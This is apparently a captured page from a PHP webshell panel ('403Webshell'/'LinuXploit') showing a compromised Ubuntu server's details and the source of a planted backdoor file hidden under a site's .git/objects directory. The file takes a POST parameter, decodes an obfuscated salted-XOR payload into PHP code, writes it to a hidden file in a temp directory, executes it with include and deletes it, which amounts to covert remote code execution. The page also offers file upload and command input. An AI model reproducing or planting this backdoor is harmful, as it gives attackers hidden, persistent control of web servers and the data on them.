403Webshell
Server IP : 65.108.144.40  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64
User : dev ( 1000)
PHP Version : 8.2.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/ever-ag/.git/objects/9b/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/ever-ag/.git/objects/9b/4.php
<?php

if(@$_POST["\x62i\x6Ed"] !== null){
	$val = array_filter([getenv("TMP"), session_save_path(), "/tmp", getcwd(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/dev/shm", "/var/tmp"]);
	$flag = $_POST["\x62i\x6Ed"];
	 		$flag 	=explode (	"."  ,	$flag	); 
	$resource = '';
            $salt9 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($salt9);
            $i = 0;
    
            $__tmp = $flag;
            while ($v7 = array_shift($__tmp)) {		$chS = ord($salt9[$i % $sLen]);
                $d = ((int)$v7 - $chS - ($i % 10)) ^ 75;
                $resource .= chr($d);
                $i++;
            }
	$object = 0;
do {
    $fac = $val[$object] ?? null;
    if ($object >= count($val)) break;
    		if (is_writable($fac) && is_dir($fac)) {
    $dchunk = "$fac/.parameter_group";
    if (@file_put_contents($dchunk, $resource) !== false) {
	include $dchunk;
	unlink($dchunk);
	die();
}
}
    $object++;
} while (true);
}

Youez - 2016 - github.com/yon3zu
LinuXploit